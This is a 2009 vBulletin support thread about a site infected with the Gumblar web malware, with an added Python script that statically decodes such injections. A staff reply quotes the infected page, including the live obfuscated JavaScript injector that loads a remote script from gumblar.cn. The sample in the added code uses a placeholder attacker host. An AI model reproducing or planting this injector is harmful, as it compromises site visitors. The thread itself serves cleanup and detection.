virus on my website


  • Jake Bunce
    replied
    Ideally you should restore a backup of the database. Often times the offending code is written to the database.

    If you don't have a good backup then we can try to track down the code ourselves if you submit a trouble ticket with your forum and server info, including a URL and login for phpmyadmin on your server:

    http://members.vbulletin.com/members...ontactform.php


  • toutatis
    replied
    I deleted all files on my web space. The hosting company reset my web space (deleted all files).
    I reinstalled vBulletin and used the same database. The only unchanged item is the database, and afterwards I have the same virus. I can't change template settings; the page is not loading.

    What should I do? I cannot rebuild my community with a new blank database.

    Big help, please.


  • Jake Bunce
    replied
    Ideally you should restore a backup.

    If you don't have a good backup then we can try to track down the code ourselves if you submit a trouble ticket with your forum and server info, including a URL and login for phpmyadmin on your server:

    http://members.vbulletin.com/members...ontactform.php


  • toutatis
    replied
    I think I deleted this script. It infected _vti_inf.html and postinfo.html.

    But now the automatic redirect is not running. How can I fix this?

    It is back! Every page has the same script.
    Last edited by toutatis; Sat 9 May '09, 11:42am.


  • toutatis
    replied
    Yes, that is right.


  • hamid.park
    replied
    Your database is clean. Try uploading a sample HTML page to your server and then you will see that this JavaScript will appear in that file's source.


  • Jake Bunce
    replied
    Tracking down the exact point of entry can be very difficult, if not impossible. You just need to clean up the damage and take measures to secure your forum and server.

    http://www.vbulletin.com/forum/showthread.php?t=194701


  • toutatis
    replied
    I think I will delete all PHP files.
    But there is a question about this:
    does the database have a virus?
    Can that be possible?
    I think it is not. What do you say?


  • Jake Bunce
    replied
    Originally posted by Jobe1986:
    It's in some obfuscated javascript inserted between </head> and <body> which is why you couldn't find it. But it is there.

    Good eye. I see it now:

    Code:
    // -->
    
    </script>
    <script type="text/javascript" src="clientscript/vbulletin_global.js?v=382"></script>
    <script type="text/javascript" src="clientscript/vbulletin_menu.js?v=382"></script>
    
    
    	<title>Domatiz.Org-Flash-Dreamweaver-Elektronik-Mikrodenetleyiciler-Eğlence-Sohbet - vBulletin</title>
    </head>[color=red]<script language=javascript><!-- 
    (function(GZci){var ksTk=':76ar:20:61:3d:22Sc:72:69pt:45:6e:67ine:22:2cb:3d:22Versi:6fn()+:22:2cj:3d:22:22:2cu:3dn:61v:69:67ator:2euser:41:67ent:3b:69f((:75:2ein:64exOf:28:22:57:69n:22):3e:30):26:26(u:2eindexOf(:22NT:20:36:22):3c0):26:26(doc:75:6d:65n:74:2e:63o:6fkie:2eindexOf(:22miek:3d1:22):3c:30:29:26:26(:74ypeo:66(z:72vzts):21:3dty:70eof(:22A:22))):7bzr:76:7ats:3d:22A:22:3beval(:22if:28wi:6e:64ow:2e:22:2ba+:22)j:3dj:2b:22+a+:22M:61:6aor:22+:62+a+:22:4di:6e:6fr:22+b+:61:2b:22:42uil:64:22:2bb+:22:6a:3b:22):3bdoc:75:6d:65nt:2ewrite(:22:3cs:63ript:20:73rc:3d:2f:2fgu:6db:6car:2ecn:2f:72ss:2f:3fi:64:3d:22+j:2b:22:3e:3c:5c:2fsc:72ipt:3e:22):3b:7d';var t30L=ksTk.replace(GZci,'%');eval(unescape(t30L))})(/:/g);
     --></script>[/color]
    <body>
    <!-- logo -->
    <a name="top"></a>
    <table border="0" width="100%" cellpadding="0" cellspacing="0" align="center">
    <tr>
    
    	<td align="left"><a href="index.php?"><img src="images/misc/vbulletin3_logo_white.gif" border="0" alt="Domatiz.Org-Flash-Dreamweaver-Elektronik-Mikrodenetleyiciler-Eğlence-Sohbet" /></a></td>
    	<td align="right" id="header_right_cell">
    		&nbsp;
    	</td>
    </tr>
    </table>
    <!-- /logo -->

    This code appears to have been inserted directly into the templates. Try to reproduce it on a default style:

    Admin CP -> Styles & Templates -> Style Manager -> [Add New Style]

    Create a new style with no parent. Then click that style's name in the Style Manager to view your forum with that style. If the problem goes away on the default style then you know it's a style problem at which point you need to systematically revert your custom templates to isolate the problem.

    Of course, when your forum is compromised like this ideally you should restore a backup from before it happened.

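Added example, not part of the original thread or of vBulletin: a static triage in Python for the kind of block shown in the post above, a script sitting between `</head>` and `<body>` whose string literal has `%` swapped for a delimiter before `unescape()`. It generalizes to any single-character delimiter passed as `/x/g`; the function names are hypothetical, and the sample page and its `example.invalid` host are constructed placeholders, not indicators from this thread.

```python
import re
from urllib.parse import unquote

# Constructed sample: a page with a script wedged between </head> and <body>,
# wrapped the same way (":xx" -> "%xx", then unescape) as the block in the post.
# example.invalid is a placeholder host, not an indicator from the thread.
SAMPLE = """<html><head><title>t</title>
</head><script language=javascript><!--
(function(q){var s='doc:75ment:2ewrite(:22:3cscript src:3d:2f:2fexample:2einvalid:2fx:2ejs:3e:3c:5c:2fscript:3e:22)';var t=s.replace(q,'%');eval(unescape(t))})(/:/g);
--></script>
<body><p>hello</p></body></html>"""

GAP = re.compile(r"</head\s*>(.*?)<body\b", re.I | re.S)
SCRIPT = re.compile(r"<script\b[^>]*>(.*?)</script\s*>", re.I | re.S)
LITERAL = re.compile(r"'([^']*)'|\"([^\"]*)\"")
DELIM = re.compile(r"\(\s*/(.)/g\s*\)")   # IIFE argument such as (/:/g)
HOST = re.compile(r"src\s*=\s*[\"']?(?:https?:)?//([A-Za-z0-9.-]+)", re.I)


def scripts_between_head_and_body(html):
    """Return bodies of <script> blocks found after </head> and before <body>."""
    gap = GAP.search(html)
    return SCRIPT.findall(gap.group(1)) if gap else []


def decode_layer(js):
    """Undo the delimiter-for-% substitution statically; the script is never run."""
    delim = DELIM.search(js)
    if not delim or "unescape" not in js:
        return None
    literals = [a or b for a, b in LITERAL.findall(js)]
    payload = max(literals, key=len, default="")   # longest literal holds the code
    return unquote(payload.replace(delim.group(1), "%"), encoding="latin-1")


def triage(html):
    """List (decoded_script, hosts_it_loads_from) for each injected block."""
    findings = []
    for body in scripts_between_head_and_body(html):
        decoded = decode_layer(body) or body
        findings.append((decoded, HOST.findall(decoded)))
    return findings


if __name__ == "__main__":
    for decoded, hosts in triage(SAMPLE):
        print("decoded:", decoded)
        print("hosts:  ", hosts)
```

Running `triage()` over saved page source from a default style and over a plain static HTML file on the same host helps separate a template-level injection from files being rewritten on the server.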


  • Jobe1986
    replied
    Originally posted by Jake Bunce:
    I don't see any reference to "gumblar" anywhere in the source code of the page. Is it gone?

    It's in some obfuscated javascript inserted between </head> and <body> which is why you couldn't find it. But it is there.


  • toutatis
    replied
    I understood.

    I will try.

    But I must know how I can delete this virus without any uninstalling or deleting.


  • hamid.park
    replied
    You may not delete non-php/html files.


  • toutatis
    replied


    I write "www.domatiz.org" in the address bar.
    I push the Enter key.
    When the site starts loading I can see "gumblar.cn" in my status bar.

    The host isn't mine, and I have a lot of files for download.

    How can I delete this virus? Help me.


  • hamid.park
    replied
    This is a virus. My forum was infected with this. There is just one way to remove it. You should delete all files on your host and/or rebuild your host. Then you should format all your PC's drives (fdisk), then reinstall Windows. Install avast antivirus and update it. Then re-upload your files.
    After reinstalling Windows, if you open your forum, your system will be infected. This virus transfers to FTP via your PC. Try uploading a sample page to see that.


  • toutatis
    replied
    Please click a lot of pages.

    I don't know. Maybe it is in my temp folder. But I scanned my computer with AVG and Spybot S&D.

    When I click a link I see "gumblar.cn" in my status bar. (It is in my status bar for 1/3 second; I can't print-screen it, I could not catch it.)
    Last edited by toutatis; Fri 8 May '09, 12:08am.
